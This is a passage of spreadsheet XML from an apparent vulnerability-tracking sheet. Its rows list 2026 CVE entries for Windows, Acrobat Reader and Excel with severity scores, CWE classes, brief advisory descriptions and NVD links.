      <c r="S628" s="5" t="inlineStr">
        <is>
          <t>Release of invalid pointer or reference in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77500</t>
        </is>
      </c>
    </row>
    <row r="629">
      <c r="A629" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B629" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77503</t>
        </is>
      </c>
      <c r="D629" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E629" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F629" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G629" s="5" t="inlineStr"/>
      <c r="H629" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I629" s="5" t="inlineStr"/>
      <c r="J629" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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29" s="5" t="inlineStr"/>
      <c r="M629" s="5" t="inlineStr"/>
      <c r="N629" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O629" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P629" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q629" s="5" t="inlineStr"/>
      <c r="R629" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S629" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77503</t>
        </is>
      </c>
    </row>
    <row r="630">
      <c r="A630" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B630" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77904</t>
        </is>
      </c>
      <c r="D630" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E630" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F630" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G630" s="5" t="inlineStr"/>
      <c r="H630" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I630" s="5" t="inlineStr"/>
      <c r="J630" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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30" s="5" t="inlineStr"/>
      <c r="M630" s="5" t="inlineStr"/>
      <c r="N630" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O630" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P630" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q630" s="5" t="inlineStr"/>
      <c r="R630" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S630" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77904</t>
        </is>
      </c>
    </row>
    <row r="631">
      <c r="A631" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B631" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78447</t>
        </is>
      </c>
      <c r="D631" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E631" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F631" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G631" s="5" t="inlineStr"/>
      <c r="H631" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I631" s="5" t="inlineStr"/>
      <c r="J631" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K63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31" s="5" t="inlineStr"/>
      <c r="M631" s="5" t="inlineStr"/>
      <c r="N631" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O631" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P631" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q631" s="5" t="inlineStr"/>
      <c r="R631" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S631" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78447</t>
        </is>
      </c>
    </row>
    <row r="632">
      <c r="A632" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B632" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78448</t>
        </is>
      </c>
      <c r="D632" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E632" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F632" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G632" s="5" t="inlineStr"/>
      <c r="H632" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I632" s="5" t="inlineStr"/>
      <c r="J632" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K63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32" s="5" t="inlineStr"/>
      <c r="M632" s="5" t="inlineStr"/>
      <c r="N632" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O632" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P632" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q632" s="5" t="inlineStr"/>
      <c r="R632" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S632" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78448</t>
        </is>
      </c>
    </row>
    <row r="633">
      <c r="A633" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B633" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79907</t>
        </is>
      </c>
      <c r="D633" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E633" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F633" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G633" s="5" t="inlineStr"/>
      <c r="H633" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I633" s="5" t="inlineStr"/>
      <c r="J633" s="5" t="inlineStr"/>
      <c r="K633" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L633" s="5" t="inlineStr"/>
      <c r="M633" s="5" t="inlineStr"/>
      <c r="N633" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O633" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P633" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q633" s="5" t="inlineStr"/>
      <c r="R633" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S633" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Double Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79907</t>
        </is>
      </c>
    </row>
    <row r="634">
      <c r="A634" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B634" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79908</t>
        </is>
      </c>
      <c r="D634" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E634" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F634" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G634" s="5" t="inlineStr"/>
      <c r="H634" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I634" s="5" t="inlineStr"/>
      <c r="J634" s="5" t="inlineStr"/>
      <c r="K634" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L634" s="5" t="inlineStr"/>
      <c r="M634" s="5" t="inlineStr"/>
      <c r="N634" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O634" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P634" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q634" s="5" t="inlineStr"/>
      <c r="R634" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S634" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79908</t>
        </is>
      </c>
    </row>
    <row r="635">
      <c r="A635" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B635" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79909</t>
        </is>
      </c>
      <c r="D635" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E635" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F635" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G635" s="5" t="inlineStr"/>
      <c r="H635" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I635" s="5" t="inlineStr"/>
      <c r="J635" s="5" t="inlineStr"/>
      <c r="K635" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L635" s="5" t="inlineStr"/>
      <c r="M635" s="5" t="inlineStr"/>
      <c r="N635" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O635" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P635" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q635" s="5" t="inlineStr"/>
      <c r="R635" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S635" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79909</t>
        </is>
      </c>
    </row>
    <row r="636">
      <c r="A636" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B636" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80075</t>
        </is>
      </c>
      <c r="D636" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E636" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F636" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G636" s="5" t="inlineStr"/>
      <c r="H636" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I636" s="5" t="inlineStr"/>
      <c r="J636" s="5" t="inlineStr"/>
      <c r="K636" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L636" s="5" t="inlineStr"/>
      <c r="M636" s="5" t="inlineStr"/>
      <c r="N636" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O636" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P636" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q636" s="5" t="inlineStr"/>
      <c r="R636" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S636" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Work Folders allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80075</t>
        </is>
      </c>
    </row>
    <row r="637">
      <c r="A637" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B637" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80161</t>
        </is>
      </c>
      <c r="D637" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E637" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F637" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G637" s="5" t="inlineStr"/>
      <c r="H637" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I637" s="5" t="inlineStr"/>
      <c r="J637" s="5" t="inlineStr"/>
      <c r="K637" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L637" s="5" t="inlineStr"/>
      <c r="M637" s="5" t="inlineStr"/>
      <c r="N637" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O637" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P637" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q637" s="5" t="inlineStr"/>
      <c r="R637" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S637" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Access of Resource Using Incompatible Type ('Type Confusion') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80161</t>
        </is>
      </c>
    </row>
    <row r="638">
      <c r="A638" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B638" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81353</t>
        </is>
      </c>
      <c r="D638" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E638" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F638" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G638" s="5" t="inlineStr"/>
      <c r="H638" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I638" s="5" t="inlineStr"/>
      <c r="J638" s="5" t="inlineStr"/>
      <c r="K638" s="5" t="inlineStr">
        <is>
          <t>microsoft:heif_image_extension</t>
        </is>
      </c>
      <c r="L638" s="5" t="inlineStr"/>
      <c r="M638" s="5" t="inlineStr"/>
      <c r="N638" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O638" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P638" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q638" s="5" t="inlineStr"/>
      <c r="R638" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S638" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81353</t>
        </is>
      </c>
    </row>
    <row r="639">
      <c r="A639" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B639" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81386</t>
        </is>
      </c>
      <c r="D639" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E639" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F639" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G639" s="5" t="inlineStr"/>
      <c r="H639" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I639" s="5" t="inlineStr"/>
      <c r="J639" s="5" t="inlineStr"/>
      <c r="K639" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L639" s="5" t="inlineStr"/>
      <c r="M639" s="5" t="inlineStr"/>
      <c r="N639" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O639" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P639" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q639" s="5" t="inlineStr"/>
      <c r="R639" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S639" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81386</t>
        </is>
      </c>
    </row>
    <row r="640">
      <c r="A640" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B640" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81388</t>
        </is>
      </c>
      <c r="D640" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E640" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F640" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G640" s="5" t="inlineStr"/>
      <c r="H640" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I640" s="5" t="inlineStr"/>
      <c r="J640" s="5" t="inlineStr"/>
      <c r="K640" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L640" s="5" t="inlineStr"/>
      <c r="M640" s="5" t="inlineStr"/>
      <c r="N640" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O640" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P640" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q640" s="5" t="inlineStr"/>
      <c r="R640" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S640" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81388</t>
        </is>
      </c>
    </row>
    <row r="641">
      <c r="A641" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B641" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81396</t>
        </is>
      </c>
      <c r="D641" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E641" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F641" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G641" s="5" t="inlineStr"/>
      <c r="H641" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I641" s="5" t="inlineStr"/>
      <c r="J641" s="5" t="inlineStr"/>
      <c r="K641" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L641" s="5" t="inlineStr"/>
      <c r="M641" s="5" t="inlineStr"/>
      <c r="N641" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O641" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P641" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q641" s="5" t="inlineStr"/>
      <c r="R641" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-193</t>
        </is>
      </c>
      <c r="S641" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81396</t>
        </is>
      </c>
    </row>
    <row r="642">
      <c r="A642" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B642" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81397</t>
        </is>
      </c>
      <c r="D642" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E642" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F642" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G642" s="5" t="inlineStr"/>
      <c r="H642" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I642" s="5" t="inlineStr"/>
      <c r="J642" s="5" t="inlineStr"/>
      <c r="K642" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L642" s="5" t="inlineStr"/>
      <c r="M642" s="5" t="inlineStr"/>
      <c r="N642" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O642" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P642" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q642" s="5" t="inlineStr"/>
      <c r="R642" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S642" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81397</t>
        </is>
      </c>
    </row>
    <row r="643">
      <c r="A643" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B643" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81398</t>
        </is>
      </c>
      <c r="D643" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E643" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F643" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G643" s="5" t="inlineStr"/>
      <c r="H643" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I643" s="5" t="inlineStr"/>
      <c r="J643" s="5" t="inlineStr"/>
      <c r="K643" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L643" s="5" t="inlineStr"/>
      <c r="M643" s="5" t="inlineStr"/>
      <c r="N643" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O643" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P643" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q643" s="5" t="inlineStr"/>
      <c r="R643" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S643" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81398</t>
        </is>
      </c>
    </row>
    <row r="644">
      <c r="A644" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B644" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81947</t>
        </is>
      </c>
      <c r="D644" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E644" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F644" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G644" s="5" t="inlineStr"/>
      <c r="H644" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I644" s="5" t="inlineStr"/>
      <c r="J644" s="5" t="inlineStr"/>
      <c r="K644" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t>
        </is>
      </c>
      <c r="L644" s="5" t="inlineStr"/>
      <c r="M644" s="5" t="inlineStr"/>
      <c r="N644" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O644" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P644" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q644" s="5" t="inlineStr"/>
      <c r="R644" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S644" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81947</t>
        </is>
      </c>
    </row>
    <row r="645">
      <c r="A645" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B645" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81948</t>
        </is>
      </c>
      <c r="D645" s="5" t="n">
